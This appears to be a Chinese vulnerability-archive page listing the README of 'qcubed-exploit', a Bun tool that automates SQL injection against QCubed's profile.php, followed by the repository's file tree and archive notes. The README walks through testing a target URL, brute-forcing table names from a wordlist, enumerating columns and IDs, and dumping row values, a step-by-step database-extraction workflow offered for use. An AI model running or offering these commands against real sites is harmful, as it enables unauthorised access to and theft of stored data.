关联漏洞
描述
automated SQL injection for QCubed profile.php file
介绍
# qcubed-exploit
You need Bun to be installed: https://bun.sh
To install dependencies:
```bash
bun install
```
To run:
```bash
# show help
bun run exploit -h
# test for vulnerability
bun run exploit vulnerable -u https://site.com/framework/assets/_core/php/profile.php
# create a session for a new target
bun run exploit create -n your_session_name -u https://site.com/framework/assets/_core/php/profile.php
# brute table
bun run exploit brute-table -n your_session_name -w path/to/wordlist.txt
# show founded tables or column of a table
bun run exploit show-table -n your_session_name
bun run exploit show-column -n your_session_name -t table_name
# brute id
bun run exploit brute-id -n your_session_name -t table_name -i 1
# brute row value
# optionally add -r for resuming the brute forcing from where it stopped
bun run exploit brute-column -n your_session_name -t table_name -c column_name -i 1
# show founded key-value pairs of a table
# optionally `-i id_value` for showing only for a particular id
bun run exploit show-rows -n your_session_name -t table_name
```
文件快照
[4.0K] /data/pocs/848f61f278c0d71dd292284bad9e8943c20f8c0d
├── [1.9K] args.ts
├── [ 20K] bun.lockb
├── [2.5K] index.ts
├── [ 478] package.json
├── [ 835] profileLoader.ts
├── [1.1K] README.md
├── [4.0K] scripts
│ ├── [ 775] common.ts
│ ├── [ 239] git.ts
│ ├── [1021] plugin.ts
│ ├── [4.0K] profile
│ └── [ 20K] profile.ts
└── [ 482] tsconfig.json
2 directories, 11 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。